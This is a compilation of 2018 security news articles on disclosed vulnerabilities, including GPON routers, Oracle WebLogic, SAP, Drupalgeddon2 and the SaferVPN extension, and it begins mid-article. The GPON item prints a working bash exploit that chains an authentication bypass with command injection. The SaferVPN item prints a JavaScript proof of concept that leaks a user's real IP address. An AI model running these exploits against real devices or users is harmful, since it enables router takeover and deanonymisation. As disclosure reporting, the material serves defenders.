Additional checks revealed that it is possible for the user to read and write from/to the mapped pages. Thus, an attacker could eventually trigger code execution in kernel space, the researchers explain.

“While the vulnerability was found using a simple search, it was introduced to the kernel eight years ago. This fact can teach us that even on a popular open source project as the Linux Kernel, you could always hope to find vulnerabilities if you know where to search.” concluded CheckPoint.


Critical RCE vulnerability found in over a million GPON Home Routers
1.5.2018 securityaffairs
Vulnerebility

Security researchers at VPNMentor conducted a comprehensive assessment on of a number of GPON home routers and discovered a Critical remote code vulnerability that could be exploited to gain full control over them.
The researchers have found a way to bypass the authentication to access the GPON home routers (CVE-2018-10561). The experts chained this authentication bypass flaw with another command injection vulnerability (CVE-2018-10562) and were able to execute commands on the device.

GPON Home Routers hack

Exploitation:
Analyzing the firmware of the GPON home routers, the experts found two different critical vulnerabilities (CVE-2018-10561 & CVE-2018-10562) that could be chained to allow complete control of the vulnerable device and therefore the network. The first vulnerability exploits the authentication mechanism of the device, it could be exploited by an attacker to bypass all authentication.

The vulnerability effects the build in HTTP servers, which check for specific paths when authenticating. This allows the attacker to bypass authentication on any endpoint using a simple trick.

By appending

?images/ to the URL

the attacker can bypass the endpoint.

This works on both HTML pages and GponForm/

For instance, by inserting

/menu.html?images/

or
/GponForm/diag_FORM?images/

the experts were able to control the GPON Home Routers.

While looking through the device functionalities, the experts noticed the diagnostic endpoint contained the ping and traceroute commands. It didn’t take much to figure out that the commands can be injected using the host parameter.

“Since the router saves ping results in /tmp and transmits it to the user when the user revisits /diag.html, it’s quite simple to execute commands and retrieve their output with the authentication bypass vulnerability.” reads the analysis published by VPNMentor.

The experts included the following bash version of the exploit code:

#!/bin/bash

echo "[+] Sending the Command... "

“We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices” continues the post:

curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting...."
sleep 3
echo "[+] Retrieving the ouput...."
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'

GPON is a very popular passive optical network device that uses fiber-optics, these devices are provided by ISPs. In the video, you can see that over one million people use this type of network system router.

Below a video PoC published by the researchers:

“We tested this vulnerability on many random GPON routers, and the vulnerability was found on all of them. Because so many people use these types of routers, this vulnerability can result in an entire network compromise.” concluded the experts.

Recommendations:
Check if your router uses the GPON network.
Be aware that GPON routers can be hacked and exploited.
Talk to your ISP to see what they can do to fix the bug.
Warn your friends on Facebook (click here to share) and Twitter (click here to tweet).


Oracle botches CVE-2018-2628 patch and hackers promptly start scanning for vulnerable WebLogic installs
30.4.2018 securityaffairs
Vulnerebility

According to a security expert, Oracle appears to have botched the CVE-2018-2628 fix, this means that attackers could bypass it to take over WebLogic servers.
Earlier April, Oracle patched the critical CVE-2018-2628 vulnerability in Oracle WebLogic server, but an Alibaba security researcher @pyn3rd discovered that the proposed fix could be bypassed.

pyn3rd
@pyn3rd
#CVE-2018-2628 Weblogic Server Deserialization Remote Command Execution. Unfortunately the Critical Patch Update of 2018.4 can be bypassed easily.

8:24 AM - Apr 28, 2018
350
249 people are talking about this
Twitter Ads info and privacy
The CVE-2018-2628 flaw was addressed in Oracle’s Critical Patch Update (CPU) security advisory, a remote attacker can easily exploit the vulnerability to completely take over an Oracle WebLogic server.

“Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3.” reads the description provided by Mitre. “Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts).”
@pyn3rd added that it is quite easy to bypass the patch:

just4pentest
@just4pentest
29 Apr
Replying to @pyn3rd
How to bypass??

pyn3rd
@pyn3rd
there is the difference, just use <java.rmi.activation.Activator> replace <java.rmi.registry.Registry> pic.twitter.com/xeH0Ck86G3

7:30 AM - Apr 29, 2018

12
See pyn3rd's other Tweets
Twitter Ads info and privacy
The popular cyber security expert Kevin Beaumont explained that the mitigation implemented by Oracle seems to only blacklist commands.

Kevin Beaumont

@GossiTheDog
29 Apr
Oh dear. There’s a zero day in Oracle WebLogic because the April patch didn’t fix the issue properly. Mitigation: make sure port 7001 TCP is blocked inbound to your Fusion stack boxes. https://twitter.com/pyn3rd/status/990114565219344384 …

Kevin Beaumont

@GossiTheDog
This is going to keep being an evergreen tweet. It looks like Oracle isn’t even fixing the issues here, they’re just blacklisting commands. In this case they missed the very next command. https://twitter.com/gossithedog/status/987448846887411712?s=21 …

6:01 PM - Apr 29, 2018
39
20 people are talking about this
Twitter Ads info and privacy
Such kind of errors could have serious consequences on the end users, since April 17, (just after Oracle published the quarterly Critical Patch Update (CPU) advisory). experts are observing threat actors started scanning the Internet, searching for Oracle WebLogic servers.

After Oracle published the Critical Patch Updates, the researchers Xinxi published the technical details of the CVE-2018-2628 vulnerability and later a user with moniker ‘Brianwrf’ shared proof-of-concept (PoC) code on GitHub.

The availability of the PoC code caused a spike in scans for port 7001 that runs the vulnerable WebLogic T3 service.

In the following graph from SANS Institute shows the spike in Internet scans for port 7001:

CVE-2018-2628 scans


90% of the SAP customers exposed to hack due to 13 Year-Old configuration flaw
29.4.2018 securityaffairs
Vulnerebility

Many companies using SAP systems ignore to be impacted by a 13-year-old security configuration that could expose their architecture to cyber attacks.
According to the security firm Onapsis, 90 percent SAP systems were impacted by the vulnerability that affects SAP Netweaver and that can be exploited by a remote unauthenticated attacker who has network access to the system.

Because SAP Netweaver technology is the pillar for SAP solutions, including the SAP ERP and S/4 HANA, at least 378,000 users worldwide are affected.

“How critical is this vulnerability? SAP Netweaver installations, if not properly secured, could be compromised by a remote unauthenticated attacker having only network access to the system.” reads the report published by Onapsis says

“Attackers can obtain unrestricted access to SAP systems, enabling them to compromise the platform along with all of its information, modify or extract this information or shut the system down. It affects all SAP Netweaver versions and still exists within the default security settings on every Netweaver-based SAP product such as the SAP ERP, including the latest versions such as S/4HANA.”

The configuration relates to how components of the SAP infrastructure communicate, with a specific focus on Application Servers, SAP Message Servers, and the SAP Central Instance.

SAP configuration issue

Every time a new app is created, the sysadmin must register the new app (Application Server) with the SAP Message Server, the registration is performed via internal port 39<xx> (3900 by default).

The SAP Message Servers implements an access control list (ACL) mechanism for the access to the registration port.

“The SAP Message Server implements a protection mechanism, also known as ACL or access control list, to check which IP addresses can register an application server and which ones cannot.” continues the report.

“This ACL is controlled by the profile parameter “ms/acl_info”. This parameter should contain a path to a file with the following format:

HOST=[*| ip-adr | hostname | Subnet-mask | Domin ] [, …]”

SAP published details on how to properly configure this access file in 2005 through SAP Security Note #8218752 ‘security settings in the message server.’

“Nevertheless, this parameter is set with default configuration, as well as the ACL contents open, allowing any host with network access to the SAP Message Server to register an application server in the SAP system.” continues the Onapsis’s report.

An attacker can exploit improper configuration of a secure Message Server ACL to register a fake Application Server that could be abused to gain full control of the SAP install.

The experts highlighted that the issue could be mitigated by properly configuring the SAP Message Server ACL.

Below the Step by step remediation provided by Onapsis:

Properly configure SAP Message Server ACL. SAP published instructions for this more than ten years ago, which confirms the need for more investment and education in SAP cybersecurity if this vulnerability is still present in your systems.
Implement continuous monitoring and compliance checks to validate that security-relevant configurations such as the Message Server ACL files do not change the security posture of the entire system.
Implement an SAP cybersecurity program that helps bridge the gap between teams: Align IT Security, Internal Audit, BASIS and SAP Security teams towards the unified goal of running secure SAP applications.


Expert shows how to trigger blue-screen-of-death on Windows by triggering NTFS flaw
28.4.2018 securityaffairs
Vulnerebility

Bitdefender researcher Marius Tivadar has developed a dodgy NTFS file system image that could trigger a blue-screen-of-death when a mount is attempted on Windows 7 and 10 systems.
The Bitdefender expert Marius Tivadar has discovered a vulnerability tied the way Microsoft handles of NTFS filesystem images, he also published a proof-of-concept code on GitHub that could be used to cause Blue Screen of Death within seconds on most Windows computers.

“One can generate blue-screen-of-death using a handcrafted NTFS image. This Denial of Service type of attack, can be driven from user mode, limited user account or Administrator. It can even crash the system if it is in locked state.” wrote Tivadar.

The PoC code includes a malformed NTFS image can be stored on a USB thumb drive. Once the user will insert the USB thumb drive in a Windows PC it will crash the system within a few seconds causing a Blue Screen of Death.

Tivadar highlighted that auto-play is activated by default and even disabling it the system will crash when the NTFS image is accessed.
The expert noticed that some security tools like Windows Defender scans the USB stick triggering the flaw.
NTFS hack
Tivadar reported the NTFS issue to Microsoft in July 2017, but the tech giant did not recognize it as a security bug so the expert opted to disclose the flaw.

Microsoft pointed out that the exploitation of the issue requires either physical access, but Tivadar explained that an attacker could use a malware to exploit the PoC code.

Tivadar noticed that the NTFS bug also works while the PC is locked, this is an anomaly because there is no need to mount a USB stick/volume when the system is locked.

“Generally speaking, no driver should be loaded, no code should get executed when the system is locked and external peripherals are inserted into the machine.” the researcher explained.

Tivadar published two PoC videos on his personal Google Photos account and on his Google Drive account.


Microsoft Releases More Microcode Patches for Spectre Flaw
27.4.2018 securityweek 
Vulnerebility

Microsoft this week released another round of software and microcode updates designed to address the CPU vulnerability known as Spectre Variant 2.

Microsoft has been releasing software mitigations for the Spectre and Meltdown vulnerabilities since January, shortly after researchers disclosed the flaws.

A new standalone security update (4078407) enables by default the mitigations against Spectre Variant 2 in all supported versions of Windows 10 and Windows Server 2016. Alternatively, advanced users can manually enable these mitigations through registry settings.

The company announced in early March that microcode updates from Intel will be delivered to Windows 10 and Windows Server 2016 users through the Microsoft Update Catalog. The first round of updates covered devices with Intel Skylake processors and the list was later expanded to include Coffee Lake and Kaby Lake CPUs.

Broadwell and Haswell processors have now also been added to the list, which currently includes tens of Intel CPUs across roughly 30 microarchitecture categories. Intel announced the availability of microcode updates for Broadwell and Haswell CPUs in late February.

Meltdown and Spectre allow malicious applications to bypass memory isolation and access sensitive data. Meltdown attacks are possible due to CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Spectre Variant 1 can be resolved with software updates, but Spectre Variant 2 requires microcode patches as well.

Last month, Microsoft released out-of-band updates for Windows 7 and Windows Server 2008 R2 to address a serious privilege escalation vulnerability introduced by the Meltdown mitigations.


13 Year-Old Configuration Flaw Impacts Most SAP Deployments
27.4.2018 securityweek 
Vulnerebility

Most SAP implementations continue to be impacted by a security configuration flaw initially documented in 2005, Onapsis warns.

Neglected security configurations and unintentional configuration drifts of previously secured systems render SAP implementations vulnerable despite the release of several Security Notes designed to address the issues. According to Onapsis, a firm that specializes in securing SAP and Oracle applications, 9 out of 10 SAP systems were found vulnerable to the bug.

The security bug impacts SAP Netweaver and can be exploited by a remote unauthenticated attacker who has network access to the system. By targeting the bug, an attacker could gain unrestricted access to the system, thus being able to compromise the platform and all of the information on it, extract data, or shut the system down.

The vulnerability impacts all SAP Netweaver versions. Because SAP Netweaver is the foundation of all SAP deployments, 378,000 customers worldwide are affected, Onapsis says. The vulnerability exists within the default security settings on every Netweaver-based SAP product. Even the next generation digital business suite S/4HANA is impacted.

In a report detailing the vulnerability, Onapsis explains that a protection scheme through ACL (access control list) ensures that SAP Application Servers are registered within the SAP Message Server to work. Registration is performed using internal port 39<xx> (3900 by default), and SAP explained in a Security Note in 2010 that the port should be secured and only accessible by trusted application IP addresses.

The Message Server ACL, designed to check “which IP addresses can register an application server and which ones cannot,” is controlled by a profile parameter (ms/acl_info) that should contain a path to a file with a specific format. SAP published details on how to properly configure this access file in a Security Note in 2015.

“Nevertheless, this parameter is set with default configuration, as well as the ACL contents open, allowing any host with network access to the SAP Message Server to register an application server in the SAP system,” Onapsis explains.

By exploiting the lack of a secure Message Server ACL configuration on a SAP System, an attacker can register a fake Application Server, which could then be abused to achieve full system compromise through more complex attacks.

For a successful attack, however, an actor needs to take advantage of this misconfiguration: access to the Message Server internal port with a default configuration in the ACL. This means that proper configuration of SAP Message Server ACL should mitigate the risks associated with the attack.

Organizations are also advised to implement continuous monitoring and compliance checks to ensure relevant configurations don’t affect the security posture of the system, as well as to implement a SAP cybersecurity program that helps bridge the gap between teams.

“While much attention this year will go to new vulnerabilities, such as IoT, Meltdown and Spectre, there is a more silent threat lurking behind the scenes that may be as serious and certainly as broad. Many SAP landscapes are so interconnected and complex that taking a system offline to implement a secure configuration can be very disruptive to the organization. That being said, it is critical that organizations ensure that they make the time to implement the configuration. These upgrades must be planned out and timed to have the lowest impact on the organization,” said JP Perez-Etchegoyen, CTO at Onapsis.


CVE-2018-7602 – Drupal addressed a new vulnerability associated with Drupalgeddon2 flaw
27.4.2018 securityweek 
Vulnerebility

The new flaw tracked as CVE-2018-7602, is a highly critical remote code execution issue, Drupal team fixed it with the release of versions 7.59, 8.4.8 and 8.5.3.
Drupal team has released updates for versions 7 and 8 of the popular content management system (CMS) to address the recently disclosed CVE-2018-7600 Drupalgeddon2 flaw.

The new flaw tracked as CVE-2018-7602, is a highly critical remote code execution issue, Drupal team fixed it with the release of versions 7.59, 8.4.8 and 8.5.3.

“A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core – Highly critical – Remote Code Execution – SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.“reads the security advisory published by Drupal.

Administrators of websites running the Drupal CMS who cannot immediately update their version can apply a patch, but it only works if the fix for the original Drupalgeddon2 flaw is present. If the previous patch was not installed, the website may already be compromised, Drupal developers warned.

Both CVE-2018-7600 and CVE-2018-7602 have been exploited in the wild.

A week after the release of the security update for the CVE-2018-7600 flaw, a proof-of-concept (PoC) exploit was publicly disclosed.

The experts at security firm Check Point along with Drupal experts at Dofinity analyzed the CMS to analyzed the Drupalgeddon2 vulnerability and published a technical report on the flaw.

“In brief, Drupal had insufficient input sanitation on Form API (FAPI) AJAX requests. As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication.” reads the analysis.

“By exploiting this vulnerability an attacker would have been able to carry out a full site takeover of any Drupal customer.”

After the publication of the report. the expert Vitalii Rudnykh shared a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”

Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw.

The new CVE-2018-7602 vulnerability was discovered while members of the Drupal Security Team with the help of the Drupal developer Jasper Mattsson were analyzing the original Drupalgeddon2 flaw.

Security experts speculate the vulnerability may have been exploited to launch the ransomware-based attack on the website of the Ukrainian energy ministry.

Drupalgeddon2

Unfortunately, several threat actors are exploiting the Drupalgeddon2 flaw in the wild, security experts observed crooks using the exploit to deliver cryptocurrency miners such as XMRig and CGMiner.

According to the analysis published by experts at security firm Volexity, threat actors are exploiting the Drupalgeddon2 flaw to deliver malicious scripts cryptocurrency miners and backdoors.

The experts associated one of the observed campaigns aimed to deliver XMRig with a cybercriminal gang that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miners in late 2017.

According to security experts at Imperva, 90% of the Drupalgeddon2 attacks are scanning activities, 3% are backdoor infection attempts, and 2% are attempting to run drop cryptocurrency miners on the vulnerable systems.


Microsoft releases new software and microcode updates to address Spectre flaw (Variant 2).
27.4.2018 securityaffairs
Vulnerebility

Microsoft has released a new batch of software and microcode updates to address the Spectre flaw (Variant 2).
The IT giant has rolled out a new batch of software and microcode security updates to address the Spectre flaw (Variant 2).

The Spectre Variant 2, aka CVE-2017-5715, is a branch target injection vulnerability, while the Meltdown and Variant 1 of the Spectre attacks can be mitigated efficiently with software updates, the Spectre Variant 2 requires microcode updates to be fully addressed.

Microsoft is one of the companies that first released security patched to address the Meltdown and Spectre vulnerabilities in Intel chips, has been releasing software mitigations for the Spectre and Meltdown flaws since January.

Now Microsoft issued the security update 4078407 that enables by default the mitigations against Spectre Variant 2 for all Windows 10 and Windows Server 2016 versions.

Microsoft anyway allows advanced users to manually enable the mitigations through registry settings.

“Applying this update will enable the Spectre Variant 2 mitigation CVE-2017-5715 – “Branch target injection vulnerability.”” reads the security advisory published by Microsoft.
Advanced users can also manually enable mitigation against Spectre, Variant 2 through the registry settings documented in the following articles:

Windows Client Guidance for IT Pros to protect against speculative execution side-channel vulnerabilities
Windows Server Guidance to protect against speculative execution side-channel vulnerabilities“

In March, Microsoft released the first set of security updates for Windows systems running on Intel Skylake processors and later the tech giant also covered Coffee Lake and Kaby Lake CPUs.

Microsoft also provided updates for Broadwell and Haswell processors.

In April, Microsoft released out-of-band updates for Windows 7 and Windows Server 2008 R2 to fix a severe privilege escalation flaw introduced by the Meltdown security patches.


Western Digital MY CLOUD EX2 storage devices leak files
26.4.2018 securityaffairs
Vulnerebility

Researchers at Trustwave have discovered that Western Digital My Cloud EX2 storage devices leak files.
Security experts at Trustwave have discovered that Western Digital My Cloud EX2 storage devices leak files on a local network by default. The situation gets worse if users configure the device for remote access and expose them online, in this scenario the My Cloud EX2 storage devices also leak files via an HTTP request on port 9000.

“unfortunately the default configuration of a new My Cloud EX2 drive allows any unauthenticated local network user to grab any files from the device using HTTP requests,” states Trustwave.

According to the experts, the problem tied the embedded UPnP media server that is automatically started when the device is powered on.

“By default, unauthenticated users can grab any files from the device completely bypassing any permissions or restrictions set by the owner or administrator,” continues Trustwave.

Trustwave revealed they found the vulnerability on January 26.

Trustwave reported the vulnerabilities to Western Digital that initially downplayed them, and only recommended users to disable the DLNA.


Trustwave published a Proof-of-Concept code for the vulnerabilities, the attack scenario sees the attackers issuing an HTTP request to port 9000 asking for the “TMSContentDirectory/Control” resource, the UPnP server, in turn, will respond with a list of files on the storage. Then the attacker uses subsequent HTTP requests to fetch files from the storage using URLs from the response collected.

“It doesn’t matter that you can set permissions and credentials on the My Cloud EX2 to make sure that your children’s photos are locked down and only available to somebody that’s actually authenticated with the device. By knowing how the traffic works with the My Cloud (EX2) appliance, you can actually get it to feed you any file on the device, regardless of the permissions. That is something new specific to this device.” continues Trustwave.

In February, researchers at Trustwave disclosed other two vulnerabilities in Western Digital My Cloud network storage devices could be exploited by a local attacker to gain root access to the NAS devices.


Drupal Patches New Flaw Related to Drupalgeddon2

26.4.2018 securityweek Vulnerebility

Drupal developers have released updates for versions 7 and 8 of the content management system (CMS) to address a new vulnerability related to the recently patched flaw known as Drupalgeddon2.

The new vulnerability, tracked as CVE-2018-7602, has been described as a highly critical issue that can be exploited for remote code execution. The flaw has been patched with the release of versions 7.59, 8.4.8 and 8.5.3.

Drupal website administrators who cannot immediately install the updates can apply a patch, but the patch only works if the fix for the original Drupalgeddon2 vulnerability (CVE-2018-7600) is present. If the previous patch was not installed, the website may already be compromised, Drupal developers warned.

CVE-2018-7602 was discovered by members of the Drupal Security Team, which consists of 34 volunteers from around the world, along with Finland-based Drupal developer Jasper Mattsson, who also reported the original vulnerability. The new flaw was identified during an investigation into CVE-2018-7600.New variant found for Drupalgeddon2 Drupal vulnerability

Drupal developers warn that similar to CVE-2018-7600, CVE-2018-7602 has also been exploited in the wild.

Drupalgeddon2 was patched in late March and the first attacks were seen roughly two weeks later, shortly after technical details and a proof-of-concept (PoC) exploit were made public.

While many of the exploitation attempts are designed to identify vulnerable systems, some cybercriminals have leveraged the flaw to deliver cryptocurrency miners, backdoors and other types of malware.

Some experts believe the security hole may have been exploited to deliver ransomware to the website of the Ukrainian energy ministry.

There are several groups exploiting Drupalgeddon2, including one that leverages a relatively large botnet named Muhstik, which is related to the old Tsunami botnet.

The botnet has helped cybercriminals make a profit by delivering cryptocurrency miners such as XMRig and CGMiner, and by launching distributed denial-of-service (DDoS) attacks.

Two security firms have independently confirmed that one of the Drupalgeddon2 campaigns delivering a Monero cryptocurrency miner is linked to a cybercriminal group that last year exploited a vulnerability in Oracle WebLogic Server (CVE-2017-10271) to infect systems with cryptocurrency malware.

Drupal powers more than one million websites, including nine percent of the top 10,000 most popular websites running a known CMS, making it a tempting target for malicious actors.


Another Critical Flaw Found In Drupal Core—Patch Your Sites Immediately
25.4.2018 thehackernews 
Vulnerebility

It's time to update your Drupal websites, once again.
For the second time within a month, Drupal has been found vulnerable to another critical vulnerability that could allow remote attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft.
Discovered by the Drupal security team, the open source content management framework is vulnerable to cross-site scripting (XSS) vulnerability that resides in a third-party plugin CKEditor which comes pre-integrated in Drupal core to help site administrators and users create interactive content.
CKEditor is a popular JavaScript-based WYSIWYG rich text editor which is being used by many websites, as well as comes pre-installed with some popular web projects.
According to a security advisory released by CKEditor, the XSS vulnerability stems from the improper validation of "img" tag in Enhanced Image plugin for CKEditor 4.5.11 and later versions.

This could allow an attacker to execute arbitrary HTML and JavaScript code in the victim's browser and gain access to sensitive information.
Enhanced Image plugin was introduced in CKEditor 4.3 and supports an advanced way of inserting images into the content using an editor.
"The vulnerability stemmed from the fact that it was possible to execute XSS inside CKEditor when using the image2 plugin (which Drupal 8 core also uses)," the Drupal security team said.
CKEditor has patched the vulnerability with the release of CKEditor version 4.9.2, which has also been patched in the CMS by the Drupal security team with the release of Drupal version 8.5.2 and Drupal 8.4.7.
Since CKEditor plugin in Drupal 7.x is configured to load from the CDN servers, it is not affected by the flaw.
However, if you have installed the CKEditor plugin manually, you are advised to download and upgrade your plugin to the latest version from its official website.
Drupal recently patched another critical vulnerability, dubbed Drupalgeddon2, a remote code execution bug that allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations under the privileges of the user, affecting all versions of Drupal from 6 to 8.
However, due to people's laziness of patching their systems and websites timely, the Drupalgeddon2 vulnerability has been found exploiting in the wild by hackers to deliver cryptocurrency miners, backdoors, and other malware.
Therefore, users are highly recommended always to take security advisories seriously and keep their systems and software up-to-date in order to avoid become victims of any cyber attack.


SAFERVPN CVE-2018-10308 VULNERABILITY, FROM DOS TO DEANONYMIZATION
25.4.2018 securityaffairs
Vulnerebility

Researchers Paulos Yibelo explored a vulnerability he found in SaferVPN Chrome Extension. The vulnerability tracked as CVE-2018-10308 should help malicious actors to retrieve vital information such as IP addresses when a user visits a website.
After my last month’s finding in Hotspot Shield, I decided to look at and audit more VPNs to see how many of the major VPN vendors are vulnerable to information leakage. Together with File Descriptor, we decided to look at 3 random major VPN clients to see what we can find. Our research was supported by the privacy advocate vpnmentor.

We initially selected PureVPN, Hotspot Shield, and Zenmate as pilot targets and went ahead with the research. what we’ve found surprised us: of all 3 VPN’s we’ve tested, we’ve discovered all of them leak sensitive data.

The vulnerabilities would have allowed governments, hostile organizations, or individuals to identify the actual IP address or DNS of a user, and in some cases hijack the user’s traffic. While Zenmate’s leak was somewhat minor compared to the two other VPNs, its still important. You can find the details of the vulnerabilities found here, here or here.

The fact that we found leaks in all the VPNs that we tested is worrying, and led us to believe VPNs may not be as safe as many may think. This opened doors for further research.Our guess is that most VPNs have similar leaks and that users should take this into consideration when using VPNs.

VPN SAFERVPN

Details

In this blog post, I will explore a vulnerability I found in SaferVPN Chrome Extension. the vulnerability, CVE-2018-10308 as simple as it is, should help malicious actors retrieve vital information such as IP addresses when a user visits a website.

When a series of simultaneous requests to a nonexistent server is sent, the VPN extension easily crashes, letting us leak real user IPs, DNS and other details which the VPN is supposed to hide.

This is a weird bug, as I didn’t know chrome extensions could be dosed until now. I’ve tried putting breakpoints through the extension’s debugger to see what is causing it and they seem to intentionally kill the extension when it resolves many non existent dns queries.

Here is a PoC that works on versions before 3.1.10

<script type=”text/javascript”>
var head = document.getElementsByTagName(‘head’)[0];
var img = document.createElement(‘img’);
img.src= “https://nonexistant.nonexistant.nonexistant”;
function kill(){
for(var i=0;i<12;i++){
head.appendChild(img);
}
}
kill();
window.onload = setTimeout(function () {
var webService = “https://freegeoip.net/json/”;
var script = document.createElement(“script”);
script.type = “text/javascript”;
script.src = webService+”?callback=MyIP&format=jsonp”;
document.getElementsByTagName(“head”)[0].appendChild(script);
}, 9000);
function MyIP(response) {
document.getElementById(“ipaddress”).innerHTML = response.ip;
}
</script>
<div id = “ipaddress”></div>

Timeline

Thu, Mar 29 – contacted SaferVPN
Thu, Apr 19 – SaferVPN patch live.


Code Execution Flaws Patched in Foxit PDF Reader
24.4.18 securityweek
Vulnerebility

Foxit has addressed over a dozen vulnerabilities in their PDF Reader, a free application that provides users with an alternative to Adobe Acrobat Reader.

Designed for viewing, creating, and editing PDF documents, Foxit PDF Reader is a popular free program that also has a broadly used browser plugin available.

Released on Friday, the latest version of the application addresses an Unsafe DLL Loading security bug reported by Ye Yint Min Thu Htut. The issue is created because the app “passes an insufficiently qualified path in loading an external library when a user launches the application,” the researcher explains.

The issue occurs when the application fails to resolve the DLL because the file doesn’t exist at the specified path. By placing a malicious DLL in the specified path directory, an attacker could exploit the vulnerability and execute remote code.

The new Foxit PDF Reader update also resolves five security vulnerabilities discovered by Cisco Talos security researchers, which could be exploited for code execution.

The first of them, CVE-2017-14458, is a use-after-free in the JavaScript engine of the application. When a document is closed, embedded JavaScript code continues to be executed, although used objects are freed up. Thus, an attacker can use a specially crafted PDF document to trigger a previously freed object, thus achieving arbitrary code execution.

“There are a couple of different ways an adversary could leverage this attack, including tricking a user into opening a malicious PDF. Or, if the browser plugin is enabled, simply viewing the document on the internet could result in exploitation,” Talos explains.

The second bug, CVE-2018-3842, is a use of an uninitialized pointer flaw in the application’s JavaScript, and could be abused to achieve remote code execution.

Cisco Talos found two other flaws in the JavaScript engine of Foxit PDF Reader, both use-after-free bugs: CVE-2018-3850 and CVE-2018-3853. The former resides in the 'this.xfa.clone()' method, which results in a use-after-free condition, while the latter resides in combinations of the 'createTemplate' and 'closeDoc' methods related to the program’s JavaScript functionality.

The fifth vulnerability (CVE-2018-3843) results from a type confusion in the way the PDF reader parses files with associated extensions. A specially crafted PDF file could be used to exploit the flaw and disclose sensitive memory or, potentially, achieve arbitrary code execution.

Other vulnerabilities addressed in Foxit PDF Reader could also result in remote code execution, in information disclosure, or in application crashes, Foxit reveals in the update’s release notes.

Affected application versions include Foxit Reader and Foxit PhantomPDF 9.0.1.1049 and earlier. The vulnerabilities were addressed in Foxit Reader and Foxit PhantomPDF 9.1.


Vulnerability in NVIDIA Tegra Chipsets Allows for Code Execution
24.4.18 securityweek
Vulnerebility

A vulnerability in NVIDIA's Tegra chipsets allows for the execution of custom code on locked-down devices, security researcher Kate Temkin reveals.

Dubbed Fusée Gelée, this exploit leverages a coldboot vulnerability through which an attacker could achieve full, unauthenticated arbitrary code execution from an early bootROM context via Tegra Recovery Mode (RCM), the security researcher says.

The code is executed on the Boot and Power Management Processor (BPMP) before any lock-outs take effect, which results in the compromise of the entire root-of-trust for each processor, while also allowing for the exfiltration of secrets.

In a technical report (PDF) detailing the flaw, Temkin notes that the issue is that an attacker can control the length of a copy operation in the USB software stack inside the boot instruction rom (IROM/bootROM). Thus, through a specially crafted USB control request, the contents of an attacker-controlled buffer can be copied over the active execution stack, gaining control of BPMP.

The attacker can then abuse the execution to exfiltrate secrets and load arbitrary code onto the main CPU Complex (CCPLEX) application processors. The code would be executed at the highest possible level of privilege (as the TrustZone Secure Monitor at PL3/EL3).

Impacting the Tegra chipset, the vulnerability is independent of software stack. However, the security bug does requires physical access to the affected hardware and cannot be exploited remotely.

Fusée Gelée, the researcher explains, is the result of a coding error in the read-only bootROM found in most Tegra devices. Because the affected component cannot be patched once it has left the factory, the vulnerability will continue to impact user devices.

The vulnerability has a broad impact and the security researcher has already responsibly disclosed it to NVIDIA, and Nintendo has been alerted as well. Temkin says she hasn’t accepted a reward for the finding.

“This vulnerability is notable due to the significant number and variety of devices affected, the severity of the issue, and the immutability of the relevant code on devices already delivered to end users. This vulnerability report is provided as a courtesy to help aid remediation efforts, guide communication, and minimize impact to users,” the security researcher notes.

Nintendo Switch is one of the affected devices, and Temkin, who works with hacking project ReSwitched, is building customized Switch firmware called Atmosphère, which takes advantage of Fusée Gelée.

The vulnerability is believed to impact all Tegra SoCs released prior to the T186 / X2. Full public disclosure is planned for June 15, 2018, but other groups are believed to be in possession of an exploit, and the disclosure might happen earlier if an implementation is released.

“By minimizing the information asymmetry between the general public and exploit-holders and notifying the public, users will be able to best assess how this vulnerability impacts their personal threat models,” the researcher says.

All Nintendo Switch devices currently in users’ hands will continue to “be able to use Fusée Gelée” throughout their lives, the researcher says. Users who already own a Switch (meaning they have a current hardware revision) will get access to Atmosphère even if they install a newer firmware version, because the core vulnerability is not software dependant.

“Fusée Gelée isn't a perfect, 'holy grail' exploit-- though in some cases it can be pretty damned close. The different variants of Fusée Gelée will each come with their own advantages and disadvantages. We'll work to make sure you have enough information to decide which version is right for you around when we release Fusée Gelée to the public, so you can decide how to move forward,” Temkin said.


Drupal to Release Second Drupalgeddon2 Patch as Attacks Continue
24.4.18 securityweek
Vulnerebility

Drupal developers announced on Monday that versions 7.x, 8.4.x and 8.5.x of the content management system (CMS) will receive a new security update later this week.

The Drupal core updates, scheduled for April 25 between 16:00 and 18:00 UTC, will deliver a follow-up patch for the highly critical vulnerability tracked as CVE-2018-7600 and dubbed “Drupalgeddon2.”

While Drupal developers have described the upcoming security releases as a follow-up to the updates that fixed Drupalgeddon2, a separate CVE identifier, namely CVE-2018-7602, has been assigned to the new vulnerability.

“For all security updates, the Drupal Security Team urges you to reserve time for core updates at that time because there is some risk that exploits might be developed within hours or days,” Drupal said. “The Security Team or any other party is not able to release any more information about this vulnerability until the announcement is made.”Follow-up patch coming from Drupalgeddon2

The Drupalgeddon2 vulnerability was patched in late March and the first attacks were spotted roughly two weeks later, shortly after technical details and a proof-of-concept (PoC) exploit were made public.

While many of the exploitation attempts represent scans designed to identify vulnerable systems, cybersecurity firms have spotted several campaigns that leverage the flaw to deliver cryptocurrency miners, backdoors and other types of malware.

